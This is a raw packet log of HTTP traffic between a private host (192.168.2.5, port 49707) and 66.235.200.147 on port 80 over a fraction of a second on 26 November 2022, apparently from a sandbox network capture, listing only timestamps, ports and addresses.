Nov 26, 2022 11:17:42.397825956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397839069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397844076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397859097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397862911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397881985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397882938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397882938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397900105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397902012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397917986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397937059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397939920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397939920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397955894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397963047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397974968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397980928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.397994041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.397999048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398013115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398020983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398030996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398040056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398051023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398057938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398070097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398073912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398087978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398091078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398107052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398112059 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398124933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398129940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398143053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398148060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398163080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398165941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398181915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398200035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398202896 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398202896 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398219109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398241043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398247004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398260117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398277044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398294926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398298025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398313046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398332119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398350000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398367882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398370981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398370981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398370981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398386002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398396969 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398406029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398421049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398437977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398453951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398467064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398467064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398472071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398488045 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398489952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398508072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398513079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398513079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398525953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398530960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398542881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398550034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398561001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398571968 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398578882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398591042 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398596048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398607969 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398613930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398626089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398633957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398643017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398652077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398662090 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398669958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398679972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398688078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398698092 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398706913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398715973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398725986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398732901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398744106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398761988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398771048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398778915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398792982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398813009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398829937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398833036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398833036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398847103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398859978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398859978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398865938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398902893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398917913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398917913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398921013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398917913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398938894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398948908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398957014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398974895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.398981094 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398981094 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.398992062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399008989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399015903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399028063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399034023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399044991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399061918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399077892 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399079084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399095058 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399097919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399116039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399126053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399132967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399142027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399149895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399168968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399187088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399204969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399211884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399220943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399239063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399240017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399257898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399260998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399276018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399296045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399301052 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399316072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399318933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399339914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399343014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399354935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399362087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399374008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399380922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399395943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399399042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399415016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399418116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399435043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399451971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399467945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399468899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399467945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399487019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399502039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399502039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399502039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399506092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399524927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399524927 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399543047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399560928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399574041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399574041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399574041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399578094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399595976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399605036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399616003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399622917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399631977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399646044 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399650097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399667025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399668932 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399684906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399693012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399703979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399722099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399724007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399743080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399743080 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399763107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399781942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399792910 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399792910 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399794102 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399820089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399828911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399840117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399844885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399858952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399868965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399877071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399893045 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399893045 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399897099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399914026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399914980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399930954 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399935007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399950027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399952888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399969101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399971962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.399987936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.399988890 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400007010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400007010 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400024891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400024891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400041103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400043011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400058985 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400063038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400078058 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400083065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400100946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400101900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400118113 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400120020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400139093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400141001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400156975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400160074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400173903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400177002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400193930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400193930 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400212049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400214911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400233984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400234938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400253057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400253057 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400269032 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400271893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400290012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400293112 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400310040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400310040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400325060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400330067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400341988 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400346994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400362015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400367975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400377989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400386095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400404930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400423050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400424004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400423050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400444031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400444984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400463104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400464058 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400485039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400494099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400502920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400517941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400517941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400522947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400537014 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400543928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400563955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400579929 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400579929 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400583029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400604010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400614977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400614977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400621891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400635004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400643110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400657892 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400662899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400676966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400681973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400696039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400702953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400717974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400721073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400739908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400742054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400760889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400763988 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400779009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400779963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400794029 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400800943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400820017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400835037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400835037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400837898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400855064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400859118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400875092 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400877953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400897980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400917053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400917053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400917053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400935888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400954008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400969028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400973082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.400988102 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.400993109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401005983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401012897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401031971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401032925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401050091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401053905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401076078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401091099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401103020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401120901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401134968 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401139021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401155949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401158094 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401173115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401180983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401190996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401207924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401207924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401225090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401230097 CET	49707	80	192.168.2.5	66.235.200.147
